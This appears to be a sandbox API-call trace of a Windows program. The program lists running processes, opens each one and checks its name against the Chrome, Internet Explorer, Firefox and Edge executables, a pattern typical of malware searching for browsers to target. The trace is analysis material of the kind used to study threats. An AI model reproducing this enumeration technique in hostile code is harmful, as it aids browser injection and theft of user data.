	[0231.022] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.022] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.023] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.023] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6994
	[0231.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.025] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.025] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.026] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.026] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.027] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6998
	[0231.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.028] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.028] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.029] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.029] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.030] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x699c
	[0231.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.031] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.032] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.032] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.032] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.033] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x69a0
	[0231.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.034] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.035] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.035] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.036] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.036] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x69a4
	[0231.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.038] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.038] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.039] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.039] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.040] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.041] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x69a8
	[0231.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.041] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.041] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.042] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.042] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.043] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0231.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x69ac
	[0231.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.044] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0231.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.044] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.045] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0231.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.045] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.046] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.047] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x69b0
	[0231.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.047] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.047] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.048] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.048] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.049] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0231.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x69b4
	[0231.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.050] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.051] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.051] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.052] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.052] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0231.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x69b8
	[0231.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.053] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0231.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.054] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.054] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0231.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.055] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.055] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.056] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x69bc
	[0231.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.056] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.057] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.057] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.058] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.058] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0231.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x69c0
	[0231.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.059] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0231.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.060] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.061] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0231.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.061] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.061] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0231.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x69c4
	[0231.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.063] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0231.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.063] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.064] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0231.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.064] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.064] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0231.065] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x69c8
	[0231.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.066] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0231.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.066] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.066] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0231.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.067] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.067] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0231.069] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x69cc
	[0231.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.069] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0231.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.069] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.070] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0231.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.070] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0231.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0231.072] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0231.073] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x69d0
	[0231.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.073] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0231.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.074] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.075] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0231.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.076] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.077] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0231.078] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x69d4
	[0231.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.078] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0231.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.078] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.079] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0231.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.079] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.080] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0231.081] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x69d8
	[0231.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.081] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0231.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.081] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.082] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0231.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.082] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.083] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0231.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x69dc
	[0231.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.085] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0231.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.085] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.086] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0231.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.086] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.087] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0231.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x69e0
	[0231.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.088] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0231.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.089] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.090] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0231.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.091] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.091] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0231.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x69e4
	[0231.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.092] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0231.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.093] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.093] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0231.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.094] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.094] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0231.095] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x69e8
	[0231.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.095] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0231.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.096] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.131] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0231.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.132] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.132] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0231.133] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x69ec
	[0231.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.133] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0231.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.134] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.135] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0231.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.135] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.136] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0231.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x69f0
	[0231.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.137] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0231.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.137] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.137] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
